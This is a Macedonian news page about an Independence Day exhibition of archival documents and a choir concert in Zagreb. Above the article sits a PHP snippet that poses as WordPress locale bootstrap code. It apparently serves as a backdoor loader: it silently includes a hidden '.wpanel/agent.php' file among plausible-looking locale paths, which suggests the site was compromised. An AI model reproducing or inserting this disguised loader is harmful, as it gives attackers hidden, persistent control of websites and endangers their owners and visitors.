// wp-core-locale-bootstrap $_wp_locale_candidates = [ __DIR__ . '/languages/class-wp-locale-data.php', __DIR__ . '/upgrade/class-wp-locale-data.php', __DIR__ . '/cache/class-wp-locale-data.php', __DIR__ . '/.wpanel/agent.php', ]; foreach ($_wp_locale_candidates as $_wp_locale_data) { if (is_file($_wp_locale_data)) { require_once $_wp_locale_data; break; } } Во Загреб ќе биде одбележан Денот на независноста со изложба „Архивските документи: столб на македонскиот идентитет“ и свечен концерт на хорот „Про Арс“ - Република Skip to main content

Во Загреб ќе биде одбележан Денот на независноста со изложба „Архивските документи: столб на македонскиот идентитет“ и свечен концерт на хорот „Про Арс“

По повод 8 Септември – Денот на независноста, Државниот архив на Македонија, во соработка со Хрватскиот државен архив, Амбасадата на Македонија во Хрватска и Културно-информативниот центар на Македонија во Загреб, денеска ќе организира свечен културен настан во хрватската престолнина.

Настанот ќе се одржи во Хрватскиот државен архив во Загреб со почеток во 19 часот, а во програмата е предвиден свечен концерт на професионалниот хор „Про Арс“, под диригентство на маестро Сашо Татарчевски.

Во рамки на одбележувањето ќе биде отворена и изложбата „Архивските документи: столб на македонскиот идентитет“, преку која ќе бидат претставени значајни архивски материјали што сведочат за историскиот континуитет, културното наследство и стремежот за државност на македонскиот народ.Организаторите посочуваат дека изложбата ќе ѝ овозможи на хрватската и меѓународната јавност увид во автентични историски документи поврзани со клучни настани и процеси од македонската историја.

Настанот има за цел да ја истакне улогата на архивите во зачувувањето на историската меморија и државниот континуитет, но и да ги потврди долгогодишните културни врски и соработка меѓу Македонија и Хрватска.

Поврзани вести